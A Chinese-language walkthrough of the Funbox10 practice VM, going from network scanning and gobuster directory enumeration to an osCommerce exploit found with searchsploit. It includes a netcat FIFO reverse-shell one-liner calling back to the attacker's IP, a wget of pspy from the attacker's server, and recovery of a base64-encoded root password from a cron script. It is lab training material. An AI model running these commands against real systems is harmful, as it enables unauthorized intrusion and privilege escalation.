Funbox10靶场--详细教程

下载安装

Funbox10官方下载地址

键盘配置和网卡修改

参考Funbox9教程

信息收集

发现主机

arp-scan -l -I eth1

因为是在一个局域网中,这里我们用arp-scan -l -I eth1 这个命令来发现目标主机IP

Funbox10靶场--详细教程_第1张图片

端口扫描和服务发现

nmap -A -p- -T5 172.30.1.141

这里我们使用nmap做端口扫描和服务发现
-A:全功能扫描
-p-:所有端口
-T5:扫描速度

Funbox10靶场--详细教程_第2张图片

web服务渗透

web服务渗透是我们最长见的一种渗透方式,我们发现目标主机是开启了80端口,80端口通常就是web服务,我们可以通过浏览器尝试访问。

Funbox10靶场--详细教程_第3张图片

我们发现主页上并没有什么好的渗透点,我们可以用gobuster工具进行网站目录挖掘

gobuster 简单介绍

apt-get update

更新下载资源包

apt-get install gobuster

下载gobuster

gobuster命令及参数介绍

Funbox10靶场--详细教程_第4张图片

completion: 为指定shell生成自动完成脚本
dir:文件路径/目录枚举
dns:dns子域名枚举
s3:枚举打开储存桶并查找存在和存储桶清单(适用aws)

命令 说明
completion 为指定shell生成自动完成脚本
dir 文件路径/目录枚举
dns dns子域名枚举
fuzz 使用模糊测试模式。替换URL、Headers和请求体中的关键词FUZZ
gcs 使用gcs bucket枚举模式
help 获取任何命令的帮助信息
s3 使用aws bucket枚举模式
tftp 使用TFTP枚举模式
version 显示当前版本
vhost 使用VHOST枚举模式(您很可能想在URL参数中使用IP地址)
参数 说明
–debug 启用调试输出
–delay duration 每个线程在请求之间的等待时间(例如1500ms)
-h 获取gobuster的帮助信息
–no-color 禁用彩色输出
–no-error 不显示错误
-z 不显示进度
-o 写入结果的输出文件(默认为stdout)
-p 包含替换模式的文件
-t 并发线程的数量(默认为10)
-v 详细输出(错误)
-w 指向字典文件的路径。设置为-以使用STDIN
–wordlist-offset int 从字典文件中的指定位置恢复(默认为0)

基本语法

gobuster dir -w 选择一个字典 -u 输入要扫描的网站 -x 扫描的文件类型 -t 线程数量

SecLists字典

SecLists字典官方下载地址

SecLists字典简介

SecLists 是安全测试人员的伴侣,它是一个收集了多种类型列表的项目,用于安全评估。这些列表包括用户名、密码、URL、敏感数据模式、模糊负载、Web shell 等。其目标是使安全测试人员能够将该存储库拉到新的测试环境中,并测试可能需要的每种类型的列表。
1.包含各种类型的列表
2.为安全测试提供方便
3.维护者有丰富经验
4.提供多种下载方式

我们可以发现包含了很多字典…略

Funbox10靶场--详细教程_第5张图片

使用gobuster枚举网站目录和文件

`gobuster dir -w /tmp/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -o funbox10_web_dir.log -x txt,php,html -u http://172.30.1.141

Funbox10靶场--详细教程_第6张图片

通过发现的http://172.30.1.141/catalog/目录访问看看是什么,我们发现这是一个网站搭快速建的框架,我们可以尝试对这个框架进行漏洞搜索看看有没有漏洞可以利用。
Funbox10靶场--详细教程_第7张图片

通过searchsploit 进行漏洞搜索

searchsploit 简介

searchsploit是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况>下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit->DB二进制文件中找到。

searchsploit 命令

命令 说明
-c 区分大小写
-e 对exploit标题进行EXACT匹配 (默认为 AND) [Implies “-t”].
-h 显示帮助
-j 以JSON格式显示结果
-m 把一个exp拷贝到当前工作目录,参数后加目标id
-o Exploit标题被允许溢出其列
-p 显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号
-t 仅仅搜索漏洞标题(默认是标题和文件的路径)
-u 检查并安装任何exploitdb软件包更新(deb或git)
-w 显示Exploit-DB.com的URL而不是本地路径(在线搜索)
–colour 搜索结果不高亮显示关键词
–id 显示EDB-ID
–nmap 使用服务版本检查Nmap XML输出中的所有结果(例如:nmap -sV -oX file.xml)
–exclude=“term” 从结果中删除值。通过使用|分隔多个值 例如–exclude=“term1|term2|erm3”

Funbox10靶场--详细教程_第8张图片

searchsploit osCommerce

通过searchsploit的搜索我们发现有很多漏洞,一般情况是从最下面的漏斗开始测试

Funbox10靶场--详细教程_第9张图片
searchsploit -m 50128.py

将指定版编号复制到当前目录

>在这里插入图片描述
python3 5018.py http://172.30.1.141/catalog

运行以后我们发现,得到了一个shell,但是shell的权限很低,我们要对权限进行升级
在这里插入图片描述
nc -lvnp 9001
通过nc获取一个反弹sehll ,发现这个shell是web访问的权限,我们需要进行提权

Funbox10靶场--详细教程_第10张图片

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.30.1.3 9001 >/tmp/f
在这里插入图片描述

pspy 权限提升工具

pspy官方下载地址
Funbox10靶场--详细教程_第11张图片

pspy简介

黑客可以利用它来查看其他用户的计划任务工作 (cron job)等,该工具也非常适合技术人员在CTF(Capture The Flag)中枚举Linux系统。 pspy是一个 命令行工具 ,它可以在没有Root权限的情况下,监控Linux进程.

python3 -c "import pty;pty.spawn('/bin/bash')"
cd /tmp

先通过python获取一个交互式shell
因为我们要上传pspy64到目标主机上,所有我们需要在一个有写权限的文件目录中去,一般情况都是去tmp目录中
Funbox10靶场--详细教程_第12张图片

python -m http.server 8080

在kail端通过python快速搭建一个文件服务器
在这里插入图片描述

wget http://172.30.1.3:8080/pspy64

下载文件到目标主机上

chmod +x pspy64

给文件执行权限

Funbox10靶场--详细教程_第13张图片
./pspy64

执行程序,我们发现有个cron的定时任务
Funbox10靶场--详细教程_第14张图片
cat /usr/share/doc/examples\cron.sh
我们发现了一个加密的参数,是用base64加密的文件(以"=="结尾的多半是base64加密),我可以尝试解密,解码后发现是root的密码和账户,我们可以尝试登录
在这里插入图片描述

Funbox10靶场--详细教程_第15张图片

完成

发现可以登录成功了!!!!!
Funbox10靶场--详细教程_第16张图片

你可能感兴趣的:(网络,服务器,运维,网络安全)